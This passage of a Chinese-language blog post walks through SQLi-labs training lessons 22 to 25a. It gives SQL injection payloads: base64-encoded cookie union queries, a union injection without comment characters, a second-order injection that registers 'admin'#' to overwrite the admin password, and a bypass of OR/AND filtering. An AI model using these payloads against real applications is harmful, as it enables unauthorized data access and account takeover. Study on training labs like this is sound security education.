<h1 id="0x16-Less-22-Cookie-Injection-base64-encoded-double-quotes"><a href="#0x16-Less-22-Cookie-Injection-base64-encoded-double-quotes" class="headerlink" title="0x16 Less-22 Cookie Injection - base64 encoded - double quotes"></a>0x16 Less-22 Cookie Injection - base64 encoded - double quotes</h1><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot; union select 1,2,database() -- ; PHPSESSID=87t6gkm00klvj0upm1vpt31ji0</span><br><span class="line"></span><br><span class="line"># base64 encode:</span><br><span class="line">uname=MSIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIC0tIA==; PHPSESSID=87t6gkm00klvj0upm1vpt31ji0</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="0x17-Less-23-GET-Error-based-strip-comments"><a href="#0x17-Less-23-GET-Error-based-strip-comments" class="headerlink" title="0x17 Less-23  GET - Error based - strip comments"></a>0x17 Less-23  GET - Error based - strip comments</h1><p>从题目可知，注入的时候不能使用注释符号。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=0&#x27; union select 1 ,database(),&#x27;</span><br></pre></td></tr></table></figure>

<h1 id="0x18-Less-24-POST-Second-Oder-Injections-Real-treat-Stored-Injection"><a href="#0x18-Less-24-POST-Second-Oder-Injections-Real-treat-Stored-Injection" class="headerlink" title="0x18 Less-24 POST- Second Oder Injections *Real treat * - Stored Injection"></a>0x18 Less-24 POST- Second Oder Injections *Real treat * - Stored Injection</h1><p>从名称我们猜到是存储行的，二次注入。<br>首先需要注册一个 admin’# 之类的账号，在后登陆之后修改密码，就可以把 admin 密码修改为我们的 payload。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">注册的时候的 SQL 应该是：</span><br><span class="line">insert into users (username,password) values (&#x27;admin&#x27;#&#x27;,&#x27;admin&#x27;);</span><br><span class="line">用户名是： admin&#x27;#</span><br><span class="line">如果修改密码的时候，执行的 SQL 就是：</span><br><span class="line">update users set password=&#x27;1234&#x27; where username=&#x27;admin&#x27;#&#x27;</span><br></pre></td></tr></table></figure>

<h1 id="0x19-Less-25-GET-Error-based-All-your-OR-AND-belongs-to-us-Single-quotes"><a href="#0x19-Less-25-GET-Error-based-All-your-OR-AND-belongs-to-us-Single-quotes" class="headerlink" title="0x19 Less-25 GET - Error based - All your OR &amp; AND belongs to us-Single quotes"></a>0x19 Less-25 GET - Error based - All your OR &amp; AND belongs to us-Single quotes</h1><p>从题目可知，or 和 and 应该是被过滤了。<br>但是如果我们可以用 union 直接进行查询，那么就不需要 or 和 and 了。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=0&#x27; union select 1,2,database() --+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="0x20-Less-25a-GET-Blind-Based-All-your-OR-AND-belongs-to-us-Intiger-based"><a href="#0x20-Less-25a-GET-Blind-Based-All-your-OR-AND-belongs-to-us-Intiger-based" class="headerlink" title="0x20 Less-25a GET - Blind Based - All your OR &amp; AND belongs to us- Intiger based"></a>0x20 Less-25a GET - Blind Based - All your OR &amp; AND belongs to us- Intiger based</h1><pre><code class="text">
</code></pre>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%89%E5%85%A8-%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%9B%98/" rel="tag"># 安全 靶场复盘</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/" rel="prev" title="HMVLabs Chapter 2: Hades">
      <i class="fa fa-chevron-left"></i> HMVLabs Chapter 2: Hades
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/04/09/hmv-challenge-72/" rel="next" title="HMV Challenge 72">
      HMV Challenge 72 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-Docker-%E4%B8%AD%E5%AE%89%E8%A3%85"><span class="nav-number">1.</span> <span class="nav-text">0x00 Docker 中安装</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-Less-1-GET-Error-based-Single-quotes-String"><span class="nav-number">2.</span> <span class="nav-text">0x01 Less-1 GET - Error based - Single quotes - String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-Less-2-GET-Error-based-Intiger-based"><span class="nav-number">3.</span> <span class="nav-text">0x02 Less-2 GET - Error based - Intiger based</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-Less-3-GET-Error-based-Single-quotes-with-twist"><span class="nav-number">4.</span> <span class="nav-text">0x03 Less-3 GET - Error based - Single quotes with twist</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-Less-4-GET-Error-based-Double-Quotes-String"><span class="nav-number">5.</span> <span class="nav-text">0x04 Less-4 GET - Error based - Double Quotes - String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-Less-5-GET-Double-Injection-Single-Quotes-String"><span class="nav-number">6.</span> <span class="nav-text">0x05 Less-5 GET - Double Injection - Single Quotes - String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x06-Less-6-GET-Double-Injection-Double-Quotes-String"><span class="nav-number">7.</span> <span class="nav-text">0x06 Less-6 GET - Double Injection - Double Quotes - String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x07-Less-7-GET-Dump-into-outfile-String"><span class="nav-number">8.</span> <span class="nav-text">0x07 Less-7 GET - Dump into outfile - String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x08-Less-8-GET-Blind-Boolian-Based-Single-Quotes"><span class="nav-number">9.</span> <span class="nav-text">0x08 Less-8 GET - Blind - Boolian Based - Single Quotes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x09-Less-9-GET-Blind-Time-based-Single-Quotes"><span class="nav-number">10.</span> <span class="nav-text">0x09 Less-9 GET - Blind - Time based. -  Single Quotes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0A-Less-10-GET-Blind-Time-based-double-quotes"><span class="nav-number">11.</span> <span class="nav-text">0x0A Less-10 GET - Blind - Time based - double quotes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0B-Less-11-POST-Error-Based-Single-quotes-String"><span class="nav-number">12.</span> <span class="nav-text">0x0B Less-11 POST - Error Based - Single quotes- String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0C-Less-12-POST-Error-Based-Double-quotes-String-with-twist"><span class="nav-number">13.</span> <span class="nav-text">0x0C Less-12 POST - Error Based - Double quotes- String - with twist</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0D-Less-13-POST-Double-Injection-Single-quotes-String-with-twist"><span class="nav-number">14.</span> <span class="nav-text">0x0D Less-13 POST - Double Injection - Single quotes-String - with twist</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0E-Less-14-POST-Double-Injection-Double-quotes-String"><span class="nav-number">15.</span> <span class="nav-text">0x0E Less-14 POST - Double Injection - Double quotes-  String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0F-Less-15-POST-Blind-Boolian-time-Based-Single-quotes"><span class="nav-number">16.</span> <span class="nav-text">0x0F Less-15 POST - Blind- Boolian&#x2F;time Based - Single quotes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x10-Less-16-POST-Blind-Boolian-Time-Based-Double-quotes-with-twist"><span class="nav-number">17.</span> <span class="nav-text">0x10 Less-16 POST - Blind- Boolian&#x2F;Time Based - Double quotes - with twist</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x11-Less-17-POST-Update-Query-Error-Based-String"><span class="nav-number">18.</span> <span class="nav-text">0x11 Less-17 POST - Update Query- Error Based -  String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x12-Less-18-POST-Header-Injection-Uagent-field-Error-Based"><span class="nav-number">19.</span> <span class="nav-text">0x12 Less-18 POST - Header Injection - Uagent field - Error Based</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x13-Less-19-POST-Header-Injection-Referer-field-Error-Based"><span class="nav-number">20.</span> <span class="nav-text">0x13 Less-19 POST - Header Injection - Referer field - Error Based</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x14-Less-20-POST-Cookie-injections"><span class="nav-number">21.</span> <span class="nav-text">0x14 Less-20 POST - Cookie injections</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x15-Less-21-Cookie-injection-base64-encoded-single-quotes-and-parenthesis"><span class="nav-number">22.</span> <span class="nav-text">0x15 Less-21 Cookie injection- base64 encoded-single  quotes and parenthesis</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x16-Less-22-Cookie-Injection-base64-encoded-double-quotes"><span class="nav-number">23.</span> <span class="nav-text">0x16 Less-22 Cookie Injection - base64 encoded - double quotes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x17-Less-23-GET-Error-based-strip-comments"><span class="nav-number">24.</span> <span class="nav-text">0x17 Less-23  GET - Error based - strip comments</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x18-Less-24-POST-Second-Oder-Injections-Real-treat-Stored-Injection"><span class="nav-number">25.</span> <span class="nav-text">0x18 Less-24 POST- Second Oder Injections *Real treat * - Stored Injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x19-Less-25-GET-Error-based-All-your-OR-AND-belongs-to-us-Single-quotes"><span class="nav-number">26.</span> <span class="nav-text">0x19 Less-25 GET - Error based - All your OR &amp; AND belongs to us-Single quotes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x20-Less-25a-GET-Blind-Based-All-your-OR-AND-belongs-to-us-Intiger-based"><span class="nav-number">27.</span> <span class="nav-text">0x20 Less-25a GET - Blind Based - All your OR &amp; AND belongs to us- Intiger based</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Todd"
      src="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
  <p class="site-author-name" itemprop="name">Todd</p>
  <div class="site-description" itemprop="description">把生命浪费在美好的实物上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ghostlitao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ghostlitao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Todd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
